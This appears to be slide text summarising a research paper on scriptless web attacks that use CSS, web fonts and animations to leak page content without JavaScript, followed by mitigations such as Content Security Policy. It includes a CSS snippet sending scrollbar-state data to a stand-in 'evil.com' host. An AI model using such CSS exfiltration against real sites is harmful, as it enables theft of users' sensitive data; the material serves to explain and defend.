SCRIPT LESS ATTACKS
STEALING THE PIE WITHOUT TOUCHING THE SILL
BACKGROUND
• XSS recently replaced SQL injection and related server-side injection
attacks as the number one threat in the OWASP (Open Web
Application Security Project) ranking.
• As popular applications like Skype, Outlook, Thunderbird, Windows 8
are using HTML, security extensions like NoScript are being used by
users.
• Given all these defense strategies, we expect that attackers will thrive
towards developing “Scriptless Attacks” which achieve same goal as
XSS attacks without using any scripting.
BEYOND SCRIPT-BASED ATTACKS
• Assumptions:
• The attacker can inject arbitrary data into the
DOM rendered by the browser
• We assume that scripting is completely
disabled
• The following browser features to be useful
building blocks in constructing attacks
- Web-fonts based on SVG and WOFF
• Attacker employ these fonts and utilize their
features to vary the properties of displayed
website content.
• CSS-based Animations
• With CSS based animations, it is possible to over time
change a wide range of CSS and DOM properties
without using any script code
ATTACK
COMPONENTS
• The CSS Content Property
• CSS allows to use a property called content to extract
arbitrary attribute values and display the value either
before, after, or instead of the selected element
a[href^=http://]:after{content:attr(href)}
• CSS Media Queries
<style type="text/css">
@media screen and (min -width:
401px){
*{ background:green;}
body:after{content:’larger view port’}
}
@media screen and (max -width:
400px) {
*{ background:red;}
body:after{content:’smaller view port’ }
}
</style >
<style type="text/css">
div#s::-webkit -scrollbar -track -piece
:vertical:increment {
background:red url(// evil.com?s); }
</style >
• To mitigate this attack,
• it is recommended to treat scrollbar backgrounds and
scrollbar state backgrounds equally;
• all background images and similar external resources
should be loaded during page-load and not on
appearance or state occurrence.
MEASUREMENT-BASED
CONTENT EXFILTRATION-
<div id="s">secret </div >
USING SMART SCROLLBARS
• To enable a purely CSS-based data exfiltration attack,
we utilize all of the available features listed in above
section.
MITIGATION TECHNIQUES
• We conclude that several layers of protection are necessary to
effectively and holistically defend against CSS-, SVG- and
HTML-based data leakage
1. Content Security Policy (CSP)
2. Detecting Detached Views
3. Miscellaneous Defense Techniques
Conclusion :
While the attacks discussed in this paper presumably do not represent the entirety
of ways to illegitimately retrieve sensitive user-data, we believe that the attack
components discussed in this paper are of great importance to other attack vectors.